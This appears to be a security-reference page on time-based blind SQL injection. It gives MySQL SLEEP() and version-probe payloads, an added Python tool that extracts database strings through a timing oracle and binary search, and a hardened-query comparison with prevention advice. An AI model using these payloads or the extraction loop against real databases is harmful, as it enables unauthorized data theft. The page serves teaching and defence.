Time based Blind SQL Injection (SQLi)

OWASP 2013-A1 OWASP 2017-A1 OWASP PC-C3 PCI v3.2- CAPEC-66 CWE-89 HIPAA-78 ISO27001-A.14.2.5 WASC-19 WSTG-INPV-05

Time-based SQL injection is a form of inferential, or blind, SQL injection. In an inferential attack the application never returns the results of the injected query in its response, so the attacker cannot read database contents directly as in an in-band attack and has to infer them instead. That is why it is also called a blind injection attack. By sending a series of true/false probes and observing how the application behaves, the attacker can still reconstruct the structure and contents of the database, one bit of information at a time.

In a time-based attack, the attacker injects SQL that forces the database to pause for a fixed interval, and makes that pause conditional on whatever question is being asked.

The response time then reveals whether the condition evaluated to true or false, and the attacker chooses the next probe accordingly. Because every character of the target data has to be enumerated separately, this is a slow intrusion technique, especially against large databases.

For example, in MySQL the SLEEP() function can be used; it has been available since MySQL 5.0.12.

        /* Resulting query (with malicious SLEEP injected). */
        SELECT * FROM table WHERE id=1-SLEEP(15)

If the response is delayed by the injected call, this proves both that the injected SQL is executed and that the backend is MySQL, since SLEEP() is MySQL-specific. The attacker can then move on to more complex payloads, for example checking the first character of the database version:

        /* Resulting query - Time-based attack to verify database version. */
        SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)
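The single probe above answers one yes/no question. The following script, added here as an example and not part of the original page, generalises it into the full extraction loop described earlier: a deliberately injectable lookup, a timing oracle that turns a SQL condition into a true/false answer, and a binary search that recovers a string one character at a time. It uses an in-memory SQLite database with a user-defined SLEEP() standing in for MySQL's SLEEP() so that it runs offline; the table, column names and the secret value are constructed for the demo.

```python
"""Time-based blind SQL injection, end to end, against a local stand-in.

Added example (not from the original page). SQLite plus a user-defined
SLEEP() stands in for MySQL; the `users` table and its contents are
constructed for the demo.
"""
import sqlite3
import time

DELAY = 0.2            # seconds the injected SLEEP() pauses the query
THRESHOLD = DELAY / 2  # a response slower than this means "condition true"


def build_vulnerable_app():
    """Return a lookup function that concatenates its argument into SQL."""
    conn = sqlite3.connect(":memory:")
    # Stand-in for MySQL's SLEEP(): pause, then return 0 like MySQL does.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'Pa55!')")

    def lookup(user_supplied_id: str):
        # VULNERABLE on purpose: this is how 'id=1-SLEEP(15)' ends up in
        # the query shown on the page.
        query = "SELECT name FROM users WHERE id=" + user_supplied_id
        return conn.execute(query).fetchall()

    return lookup


def time_oracle(lookup, condition_sql: str) -> bool:
    """Answer a yes/no question about the database using only response time.

    The CASE only evaluates SLEEP() when the condition holds, so a slow
    response means true and a fast one means false (the page's IF(...) probe).
    """
    payload = f"1-(CASE WHEN ({condition_sql}) THEN SLEEP({DELAY}) ELSE 0 END)"
    start = time.monotonic()
    lookup(payload)
    return time.monotonic() - start >= THRESHOLD


def extract_string(lookup, subquery: str, max_len: int = 32) -> str:
    """Recover the text returned by SUBQUERY, one character at a time.

    Each character is found by binary search over printable ASCII (7 timed
    probes instead of up to 95), which is the main speed-up available to a
    time-based attacker.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the string is shorter than the position being asked for.
        if not time_oracle(lookup, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if time_oracle(lookup, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    lookup = build_vulnerable_app()
    print("injection confirmed:", time_oracle(lookup, "1=1"))
    # Same idea as the page's VERSION() check, against the stand-in engine.
    print("engine version:", extract_string(lookup, "sqlite_version()"))
    print("secret:", extract_string(lookup, "SELECT secret FROM users WHERE id=1"))
```

The threshold is set to half the injected delay; against a real network target the baseline latency must be measured first and noisy probes repeated, otherwise a slow but legitimate response is misread as "true".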

Likewise, in SQL Server WAITFOR DELAY suspends execution for the specified interval (given as a time string in hh:mm:ss form), and WAITFOR TIME suspends execution until the system clock reaches the specified time of day.

Impact of Time-Based Blind SQL Injection

SQL injection is a high-risk vulnerability: it affects the confidentiality and integrity of the data, and it can also be used to bypass the authentication and authorization controls of the application.

An attacker can compromise a vulnerable application and steal sensitive information stored in databases such as user credentials, payment details, or credit card details.

How to Prevent Time-Based Blind SQL Injection

There are several effective ways to prevent SQL injection. Data that comes from an untrusted source, such as user input, must never be trusted and should be treated as potentially malicious.

We can mitigate SQL injection using the following techniques:

  • Use of prepared statements (with parameterized queries)

  • Use of stored procedures

  • Whitelist input validation

  • Escaping all user-supplied input (only as a last resort where none of the above can be applied)

  • Enforcing the least privilege
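The following is an added example, not code from the original page, showing the first and third items of that list applied to the same lookup the attack relies on: the concatenating version executes the page's SLEEP payload and stalls, the parameterized version binds the value so it is never parsed as SQL, and an allowlist check in front of it rejects the hostile input before it reaches the database at all. SQLite with a user-defined SLEEP() stands in for MySQL; the table and names are constructed for the demo.

```python
"""Vulnerable lookup beside its hardened forms.

Added example (not from the original page). SQLite with a user-defined
SLEEP() stands in for MySQL; table, column and user names are constructed.
"""
import re
import sqlite3
import time

conn = sqlite3.connect(":memory:")
conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

PAYLOAD = "1-SLEEP(0.3)"  # the page's probe, with 0.3 s instead of 15 s


def vulnerable_lookup(user_id: str):
    """String concatenation: the payload is executed and the query stalls."""
    return conn.execute("SELECT name FROM users WHERE id=" + user_id).fetchall()


def safe_lookup(user_id):
    """Parameterized query: the value is bound, never parsed as SQL, so
    '1-SLEEP(0.3)' is just a string that matches no integer id."""
    return conn.execute("SELECT name FROM users WHERE id=?", (user_id,)).fetchall()


def validated_lookup(user_id: str):
    """Allowlist validation in front of the parameterized query: only a plain
    decimal id is accepted, so hostile input never reaches the database."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", user_id):
        raise ValueError("id must be a positive integer")
    return safe_lookup(int(user_id))


def timed(fn, arg):
    """Run fn(arg) and return (rows, seconds elapsed)."""
    start = time.monotonic()
    rows = fn(arg)
    return rows, time.monotonic() - start


if __name__ == "__main__":
    for fn in (vulnerable_lookup, safe_lookup):
        rows, secs = timed(fn, PAYLOAD)
        print(f"{fn.__name__}: rows={rows} took {secs:.2f}s")
    try:
        validated_lookup(PAYLOAD)
    except ValueError as exc:
        print("validated_lookup rejected the payload:", exc)
```

Parameterization alone already defeats the injection; the allowlist check is defence in depth that also gives the application a clean error to log when a probe like this arrives.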
